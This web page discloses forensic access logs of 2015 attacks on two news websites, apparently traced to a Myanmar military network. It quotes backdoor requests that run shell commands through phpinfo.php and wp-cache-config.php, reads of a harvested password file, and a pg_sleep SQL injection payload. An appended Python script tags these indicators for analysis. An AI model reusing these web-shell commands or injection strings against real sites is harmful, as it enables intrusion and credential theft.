THE UNLEASHED ATTACK LOGS

The following files contain digital forensic data from the 1st July 2015 to the 7th December 2015.

DOWNLOAD LOG FILES
686771399fe320a57ff8d69c359f7a0c (5MB)

The webserver logs have been extracted from over 120GB of data logs related to the websites www.dvb.no, burma.irrawaddy.org, bur.irrawaddy.org and election-bur.irrawaddy.org.

This release includes close to 1 million events, of which 57 transactions have been extracted into a separate log file (summary_forensics) so that anyone interested can quickly cross-check the timestamps. Take special care to translate the timezone of the log entries.

Besides all traffic related to the Union of Hacktivists (UOH) from the military network 203.81.85.0/24, we also include connections from four other operators: Telenor Myanmar (OOREDOO), Yatanarpon Teleport, MPT and Redlink Communications.

On the 11th of November 2015, when the attackers discovered that we were monitoring them, they tried to access the backdoors from 122.248.101.151 at Yatanarpon Teleport.

Other providers, such as Cloudflare, which proxied burma.irrawaddy.org during the same time period, could also verify the validity of these log records.

We have also seen that backdoor URLs were exchanged via Facebook, since Facebook's link scraper fetched those URLs after they were shared in Facebook conversations.

#1 Filename: UNLEASHED_dvb_2015121207_203.81.85.2_attack_dscd.mil.mm.log
Target: www.dvb.no
Origin: AS9988 Myanma Posts and Telecommunications
Date:  12 December 2015
Description: Contains a pen testing attack (SQL injections) against the www.dvb.no website from 203.81.85.2 with BlueCoat ID 3DD8B0CE676F0FB8 and Squid proxy dscd.mil.mm (squid/3.1.10)


#2 Filename: UNLEASHED_irrawaddy_201507-201511_noob.log
Target: burma.irrawaddy.org
Origin: AS133385 Telenor Myanmar OOREDOO, AS131322 Yatanarpon Teleport Company Limited, AS9988 Myanma Posts and Telecommunications, AS132026 Redlink Communications Company Limited
Date: July – November 2015
Description: Contains all log entries from July – November 2015 from IP addresses that have accessed the backdoor (shell) noob.php at burma.irrawaddy.org.


#3 Filename: UNLEASHED_irrawaddy_201507-201511_203.81.85.x.log
Target: burma.irrawaddy.org
Origin: AS9988 Myanma Posts and Telecommunications (Military Network)
Date: July – November 2015
Description: Contains all the log entries from network 203.81.85.0/24 from July – November 2015 that accessed the site burma.irrawaddy.org.


#4 Filename: UNLEASHED_irrawaddy_20151111_122.248.101.151.log
Target: burma.irrawaddy.org
Origin: AS131322 Yatanarpon Teleport Company Limited
Date: 11 November 2015
Description: Contains all the log entries of IP 122.248.101.151 from when the attackers discovered that we were monitoring their traffic and tried to access all the patched backdoors from AS131322 Yatanarpon Teleport Company Limited.


#5 Filename: UNLEASHED_irrawaddy_201507-201511_access_to_log-txt.log
Target: burma.irrawaddy.org
Origin: AS21837 Opera Software Americas LLC (Proxy), AS133385 Telenor Myanmar, AS131322 Yatanarpon Teleport Company Limited, AS54994 MILEWEB, INC. (Proxy), AS9988 Myanma Posts and Telecommunications, AS132026 Redlink Communications Company Limited, AS32934 Facebook
Date: July – November 2015
Description: Contains all the log entries of the IP addresses that have accessed the log.txt file that contains all the WordPress passwords collected by the backdoor.


#6 Filename: UNLEASHED_irrawaddy_201507-201511_summary_forensics.log
Target: burma.irrawaddy.org, bur.irrawaddy.org, election-bur.irrawaddy.org
Origin: AS21837 Opera Software Americas LLC (Proxy), AS133385 Telenor Myanmar, AS131322 Yatanarpon Teleport Company Limited, AS54994 MILEWEB, INC. (Proxy), AS9988 Myanma Posts and Telecommunications, AS132026 Redlink Communications Company Limited, AS32934 Facebook
Date: July – November 2015
Description: Aggregated summary of malicious activity.


MD5SUM


EVENTS AND NUMBER OF REGISTERED RECORDS

  • Access to log.txt: 128 Records
  • SQL injection from DSCD/DSA: 32,115 Records
  • Connections from military network (5 months): 869,434 Records
  • Access to Noob Backdoor: 820 Records
  • Digested Forensics: 57 Records
  • IP activity on 11th November, when the monitoring was discovered (122.248.101.151): 393 out of 24,721 Records

203.81.71.38 - - [03/Oct/2015:02:43:13 -0400] "POST //Backup/noob.php HTTP/1.1" 200 13834 
203.81.71.49 - - [11/Oct/2015:01:42:02 -0400] "POST //Backup/noob.php HTTP/1.1" 200 52898 
203.81.71.54 - - [21/Oct/2015:06:13:10 -0400] "POST //Backup/noob.php HTTP/1.1" 200 14829 
122.248.101.151 [11/Nov/2015:00:29:59] "GET /wp-content/wp-cache-config.php?1=ls%20-al" 
61.4.76.243 - - [11/Oct/2015:07:53:39 -0400] "POST //Backup/noob.php HTTP/1.1" 200 15479 
61.4.76.60 - - [12/Oct/2015:02:41:12 -0400] "POST //Backup/noob.php HTTP/1.1" 200 15401
111.84.193.91 - - [18/Oct/2015:03:35:56 -0400] "GET /phpinfo.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 
111.84.193.91 - - [18/Oct/2015:03:35:56 -0400] "GET /phpinfo.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2146 
111.84.193.91 - - [18/Oct/2015:03:40:44 -0400] "GET /phpinfo.php?1=ls HTTP/1.1" 200 13583 
111.84.193.91 - - [18/Oct/2015:03:41:32 -0400] "GET /phpinfo.php?1=ls%20-al%20wp-admin HTTP/1.1" 200 14325 
203.81.85.66 - - [05/Oct/2015:03:10:31 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 82
203.81.85.66 - - [11/Oct/2015:21:32:55 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 90
61.4.76.60 - - [11/Oct/2015:23:39:44 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 68
2a03:2880:11:1ff5:face:b00c:0:1 - - [11/Oct/2015:23:39:57 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 206 68
203.81.85.66 - - [11/Oct/2015:23:41:16 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 68
61.4.76.60 - - [12/Oct/2015:02:37:38 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 93
203.81.85.66 - - [12/Oct/2015:02:41:36 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 93
203.81.85.66 - - [12/Oct/2015:02:41:45 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 93
203.81.85.66 - - [12/Oct/2015:02:41:46 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 93
203.81.85.66 - - [12/Oct/2015:02:41:47 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 93
61.4.76.60 - - [12/Oct/2015:15:13:57 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 404 46116
61.4.76.60 - - [13/Oct/2015:02:31:33 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 200
61.4.76.60 - - [13/Oct/2015:16:22:15 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 203
61.4.76.60 - - [15/Oct/2015:00:49:54 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 246
61.4.76.60 - - [15/Oct/2015:01:10:58 -0400] "GET /wp-admin/user/log.txt? HTTP/1.1" 200 246
61.4.76.60 - - [15/Oct/2015:10:36:09 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 268
2a03:2880:2130:cff4:face:b00c:0:1 - - [15/Oct/2015:18:38:04 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 206 275
203.81.71.20 - - [16/Oct/2015:01:53:46 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 281
111.84.193.94 - - [16/Oct/2015:01:53:50 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 281
203.81.71.20 - - [16/Oct/2015:01:59:53 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 284
111.84.193.158 - - [16/Oct/2015:09:57:18 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 304
107.167.99.139 - - [16/Oct/2015:09:58:45 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 304
168.235.195.195 - - [16/Oct/2015:10:03:06 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 304
203.81.71.13 - - [16/Oct/2015:22:59:13 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 308
168.235.195.195 - - [17/Oct/2015:04:37:45 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 313
61.4.76.60 - - [17/Oct/2015:13:32:42 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
61.4.76.60 - - [17/Oct/2015:13:33:10 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
61.4.76.60 - - [17/Oct/2015:13:33:20 -0400] "GET /phpinfo.php?1=cat%20wp-admin/user/log.txt HTTP/1.1" 200 13649
61.4.76.60 - - [18/Oct/2015:01:58:37 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
61.4.76.60 - - [18/Oct/2015:02:09:36 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 431
203.81.71.46 - - [18/Oct/2015:02:12:05 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 431
203.81.71.46 - - [18/Oct/2015:02:24:11 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 436
203.81.71.46 - - [18/Oct/2015:03:15:13 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 438
203.81.71.54 - - [24/Oct/2015:01:28:27 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.71.54 - "" [24/Oct/2015:01:28:39 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.71.54 - - [24/Oct/2015:01:29:00 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.71.54 - - [24/Oct/2015:01:29:15 -0400] "GET /phpinfo.php?1=cat%20wp-admin/user/log.txt HTTP/1.1" 200 13759
203.81.71.54 - - [24/Oct/2015:01:29:48 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.71.54 - burma [24/Oct/2015:01:29:54 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.71.54 - Heavyrain [24/Oct/2015:01:30:19 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.85.66 - rcn [02/Nov/2015:02:28:47 -0500] "GET /wp-admin HTTP/1.1" 401 381
203.81.85.66 - smorozik [06/Nov/2015:03:34:34 -0500] "GET /wp-admin/user/log.txt HTTP/1.1" 200 804
203.81.85.66 - smorozik [06/Nov/2015:03:43:39 -0500] "GET /wp-admin/user/log.txt HTTP/1.1" 200 827
203.81.85.2 - smorozik [09/Nov/2015:08:10:54 -0500] "GET /wp-admin HTTP/1.1" 401 381
203.81.85.2 - rcn [09/Nov/2015:08:10:41 -0500] "GET /wp-admin HTTP/1.1" 401 381

SQL Injection attack against www.dvb.no including the dissection of relevant HTTP headers

203.81.85.2 - - [07/Dec/2015:06:51:54 +0000] "POST /archives/123450?yop-poll-nonce-49_yp5664f37802764=39d2a53934&yop_poll_answer%5b38%5d=318&yop_poll_tr_id=lw3z4MTF');select%20pg_sleep(6);%20--%20 HTTP/1.1" 403 232 "http://burmese.dvb.no:80/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25" "---" "MM" "AS9988 Myanma Posts and Telecommunications" "-x-" "unknown, 203.81.85.2" "-" "-" "-" "-" "-" "Via:1.1 dscd.mil.mm (squid/3.1.10)" "XBV:3DD8B0CE676F0FB8" "burmese.dvb.no" "tcp80" "-" "1.692" "-"
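The notes above ask readers to translate the log timezone before cross-checking timestamps, and the excerpt mixes -0400/-0500 Irrawaddy entries with a +0000 DVB entry and one abbreviated line with no offset at all. The following script is an added example (not part of the release and not the project's own tooling) that parses such access-log lines, normalises every timestamp to UTC, tags each request with the indicators the release describes (the noob.php backdoor, the log.txt password file, command execution through phpinfo.php and wp-cache-config.php, and the pg_sleep time-based SQL injection against www.dvb.no) and marks sources inside the 203.81.85.0/24 military network. The sample lines are copied from the excerpt on this page (the DVB line shortened to its request); the indicator names, the treatment of offset-less timestamps as UTC and the regular expressions are this example's own assumptions.

```python
import ipaddress
import re
from datetime import datetime, timezone
from urllib.parse import unquote

# Apache common/combined log prefix. ident/user, status and size are optional so that
# the abbreviated line in the release (the 122.248.101.151 entry) still parses.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?:(?P<ident>\S+) (?P<user>\S+) )?'
    r'\[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"'
    r'(?: (?P<status>\d{3})(?: (?P<size>\S+))?)?'
)

# Network the release attributes to the military.
MILITARY_NET = ipaddress.ip_network("203.81.85.0/24")

# Indicators from the release notes, matched against the URL-decoded request target.
# The labels are this example's own; the paths are those shown in the excerpt.
INDICATORS = {
    "noob_backdoor": re.compile(r"noob\.php", re.I),
    "log_txt_access": re.compile(r"wp-admin/user/log\.txt", re.I),
    "phpinfo_cmd": re.compile(r"phpinfo\.php\?1=", re.I),
    "wp_cache_cmd": re.compile(r"wp-cache-config\.php\?1=", re.I),
    "sqli_pg_sleep": re.compile(r"pg_sleep\s*\(", re.I),
}

# Lines copied from the excerpt on the page; the last one is shortened to its request.
SAMPLE = """\
203.81.71.38 - - [03/Oct/2015:02:43:13 -0400] "POST //Backup/noob.php HTTP/1.1" 200 13834
122.248.101.151 [11/Nov/2015:00:29:59] "GET /wp-content/wp-cache-config.php?1=ls%20-al"
111.84.193.91 - - [18/Oct/2015:03:40:44 -0400] "GET /phpinfo.php?1=ls HTTP/1.1" 200 13583
203.81.85.66 - smorozik [06/Nov/2015:03:34:34 -0500] "GET /wp-admin/user/log.txt HTTP/1.1" 200 804
61.4.76.60 - - [17/Oct/2015:13:33:20 -0400] "GET /phpinfo.php?1=cat%20wp-admin/user/log.txt HTTP/1.1" 200 13649
203.81.85.2 - - [07/Dec/2015:06:51:54 +0000] "POST /archives/123450?yop_poll_tr_id=lw3z4MTF');select%20pg_sleep(6);%20--%20 HTTP/1.1" 403 232
"""


def parse_timestamp(ts):
    """Normalise an Apache timestamp to UTC.

    Entries with an explicit offset (-0400, -0500, +0000) are converted; an entry
    with no offset is assumed (this example's assumption) to already be in UTC.
    """
    try:
        return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
    except ValueError:
        return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S").replace(tzinfo=timezone.utc)


def parse_line(line):
    """Return a record for one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parts = m.group("req").split(" ")
    target = unquote(parts[1]) if len(parts) > 1 else ""
    ip = ipaddress.ip_address(m.group("ip"))
    user = m.group("user")
    return {
        "ip": str(ip),
        "user": None if user in (None, "-", '""') else user,
        "utc": parse_timestamp(m.group("ts")).isoformat(),
        "method": parts[0],
        "target": target,
        "status": int(m.group("status")) if m.group("status") else None,
        "tags": [name for name, rx in INDICATORS.items() if rx.search(target)],
        # IPv6 sources (e.g. the Facebook crawler) are never inside the IPv4 /24.
        "military_net": ip in MILITARY_NET,
    }


def analyze(text):
    """Parse every line and keep the records matching at least one indicator."""
    events = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and rec["tags"]:
            events.append(rec)
    return events


def summarize(events):
    """Count events per indicator plus how many came from the military network."""
    counts = {name: 0 for name in INDICATORS}
    for ev in events:
        for tag in ev["tags"]:
            counts[tag] += 1
    counts["from_military_net"] = sum(1 for ev in events if ev["military_net"])
    return counts


if __name__ == "__main__":
    events = analyze(SAMPLE)
    for ev in events:
        print(ev["utc"], ev["ip"], ev["user"] or "-", ev["status"], ",".join(ev["tags"]))
    print(summarize(events))
```

Feeding the release files through `analyze` instead of `SAMPLE` gives every matching request on one UTC timeline, which is what is needed to line the Irrawaddy entries (logged at -0400/-0500) up against the DVB entry (logged at +0000) or against a proxy provider's own records.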